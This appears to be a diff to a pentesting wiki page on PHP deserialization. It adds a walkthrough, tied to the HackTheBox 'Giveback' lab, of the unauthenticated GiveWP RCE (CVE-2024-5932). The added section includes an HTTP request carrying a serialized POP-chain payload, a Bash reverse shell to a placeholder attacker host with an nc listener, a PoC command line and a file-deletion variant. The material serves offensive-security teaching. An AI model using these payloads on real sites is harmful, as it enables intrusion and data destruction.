HTB Giveback

src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md

@@ -15,6 +15,9 @@ Steps:
   - For that you use a deserialization where the name of the class is going to be inside **`$name`**. You **cannot use "/" or "."** in a class name in a serialized object, but the **code** is **replacing** the **underscores** ("\_") **for slashes** ("/"). So a class name such as `tmp_passwd` will be transformed into `/tmp/passwd.php` and the code will try to load it.\
     A **gadget example** will be: **`O:10:"tmp_passwd":0:{}`**
 
+<details>
+<summary>spl_autoload_register autoload example</summary>
+
 ```php
 spl_autoload_register(function ($name) {
 
@@ -37,6 +40,8 @@ spl_autoload_register(function ($name) {
 });
 ```
 
+</details>
+
 > [!TIP]
 > If you have a **file upload** and can upload a file with **`.php` extension** you could **abuse this functionality directly** and get already RCE.
 
@@ -97,11 +102,28 @@ The file is deleted as soon as the object falls out of scope. TCPDF 6.9.3 tighte
 
 The call to `file_exists()` deserializes the metadata, instantiates TCPDF, and its destructor deletes the chosen file, turning html2pdf into a powerful `phar://` entry point. Version 5.3.1 added `Security::checkValidPath()` to block unapproved schemes, so legacy deployments remain attractive.
 
-## References
+### GiveWP <3.14.2 unauthenticated POP chain to RCE (CVE-2024-5932)
 
-- [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
+**GiveWP** (WordPress donation plugin) up to **3.14.1** unserializes the user-controlled **`give_title`** field during `give_process_donation` without authentication. With the plugin’s dependencies autoloaded you get a **POP chain** that reaches a callable sink.
 
-{{#include ../../banners/hacktricks-training.md}}
+- The EQSTLab PoC builds a chain using `Stripe\StripeObject` and `Give\Vendors\Faker\ValidGenerator`, sets the internal `\0*\0validator` to `shell_exec`, and tucks the attacker command in `Give\Onboarding\SettingsRepository` data.
+- POST the serialized payload as `give_title` to any donation form endpoint (e.g. `/donations/<slug>/`) with the offline gateway so no payment is attempted:
+
+```http
+POST /donations/the-things-we-need/ HTTP/1.1
+Host: giveback.htb
+Content-Type: application/x-www-form-urlencoded
 
+amount=5&give-form-id=1&give-form-title=Any&give-gateway=offline&action=give_process_donation&give_title=O:31:"Stripe\StripeObject":1:{...serialized payload...}
+```
+
+- Output is **blind**, so use a **callback payload** such as a Bash reverse shell: `bash -c "bash -i >& /dev/tcp/ATTACKER/PORT 0>&1"` and listen with `nc -lnvp PORT`.
+- The same chain can delete arbitrary files by pointing the sink at `unlink`. Use **phpggc** or the PoC (Python + `uv run CVE-2024-5932-rce.py -u <form_url> -c '<cmd>'`) to craft the blob, but any serializer able to emit PHP objects works.
+
+## References
 
+- [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
+- [HTB Giveback – CVE-2024-5932 GiveWP unauthenticated deserialization → RCE](https://0xdf.gitlab.io/2026/02/21/htb-giveback.html)
+- [EQSTLab PoC – CVE-2024-5932 GiveWP RCE](https://github.com/EQSTLab/CVE-2024-5932)
 
+{{#include ../../banners/hacktricks-training.md}}